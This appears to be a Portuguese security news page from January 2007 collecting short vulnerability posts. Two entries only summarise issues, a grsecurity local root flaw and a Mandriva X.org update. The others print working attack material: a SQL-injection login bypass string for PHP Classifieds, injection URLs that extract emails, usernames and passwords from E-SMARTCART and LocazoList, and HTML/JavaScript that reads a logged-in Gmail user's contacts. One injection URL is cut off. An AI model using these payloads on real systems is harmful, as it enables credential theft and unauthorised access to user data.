|
Por Marcelo Almeida (Vympel)
|
|
17 de janeiro de 2007 |
|
A empresa de Digital Armaments publicou uma alerta de segurança sobre uma falha no GRSecurity, um patch que tem múltiplos níveis de detecção, prevenção e modelos de contingência de ataques.
Uma falha existente no expand_stack() do patch da grsecurity pode ser explorada localmente para obter privilégios de Root.
Esta falha foi considerada grave, pois o patch grsecurity deveria conter qualquer tentativa de elevação de privilégios.
A Digital Armaments disponibilizou um exploit para a verificação da falha para usuários "platinum".
Pela politica de segurança da empresa o alerta total com toda a descrição da falha será publicada em 6 meses.
Aviso original
|
|
|
Por Raphael Martins (Ashiyakuza)
|
|
10 de janeiro de 2007 |
Mandriva disponibilizou um pacote de atualização para o pacote XORG-X11 que repara uma vulnerabilidade que pode ser explorada por usuários locais para aumento de privilégios.
Abaixo seque a lista de atualização e plataformas...
|
|
Leia mais...
|
|
|
Por Andre (djorOus)
|
|
05 de janeiro de 2007 |
|
Software vul: PHP Classifieds
URL: http://www.deltascripts.com/phpclassifieds
Versão: 6.20
Sobre: Permite fazer o login usando apenas email de um usuário válido, sem precisar do passwd.
Xploit: no login entre com um email válido(normalmente expostos nos profiles).
some@mail' — ‘
Testado com:
Apache 2.0.55 (rodando windows xp)
PHP Classifieds 6.20 Released 10.12.2005
PHP 5.0.5.5 (magic_quotes_gpc = Off)
|
|
|
Por Raphael Martins (Ashiyakuza)
|
|
03 de janeiro de 2007 |
Nome do Script: E-SMARTCART
Site do script: -
Versão Afetada: 1.0
Encontrado por ajann
Email: ajannhwt [at] hotmail.com
Exploração:
http://[target]/[path]//productdetail.asp?p=1&subcat_id=-1&category_id=-1&product_id=-1%20union%20select%200,email,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users
http://[target]/[path]//productdetail.asp?p=1&subcat_id=-1&category_id=-1&product_id=-1%20union%20select%200,userpassword,0,0,0,0,0,0,0,0,0,0,0,0,0%2
|
|
|
Por Raphael Martins (Ashiyakuza)
|
|
03 de janeiro de 2007 |
Nome do Script: LocazoList
Site do script: http://www.locazo.net:81
Versão Afetada: 2.01a beta e anteriores
Encontrado por ajann
Email: ajannhwt [at] hotmail.com
Exploração:
http://[target]/[path]//main.asp?catid=1&subcatID=-1%20union%20select%200,username,0,0,0%20from%20admin%20where%20id%20like%201
http://[target]/[path]//main.asp?catid=1&subcatID=-1%20union%20select%200,password,0,0,0%20from%20admin%20where%20id%20like%201
|
|
|
Por Andre
|
|
02 de janeiro de 2007 |
|
Simplesmente estando logado no GMail e visitando um Web site
com um código malicioso, sua lista do contato pode ser roubada assim como todos seus detalhes. O
problema ocorre porque o Google armazena os dados da lista de contatos em
um arquivo Javascript. O ataque foi testado nos browsers Firefox, Opera, IE6 e IE 7.
/---code----
<html>
<head>
<script>
function google(a) {
document.write("<ol>");
for (i = 0; i < a.Body.Contacts.length; i++) {
document.write("<li>" + a.Body.Contacts[i].Email + "</li>");
}
document.write("</ol>");
}
</script>
<script xsrc="http://docs.google.com/data/contacts?out=js&s how=ALL&psort=Affinity&callback=google&max=99999"> </script></head>
<body>
Hello
</body>
</html>
---/
Fonte: slashdot.org
|
|
|